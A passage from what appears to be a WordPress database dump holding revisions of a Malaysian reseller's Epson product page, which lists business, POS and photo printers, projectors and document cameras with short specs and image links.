Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:04:21','2019-09-25 09:04:21','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3459,1,'2019-09-25 17:11:30','2019-09-25 09:11:30','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness 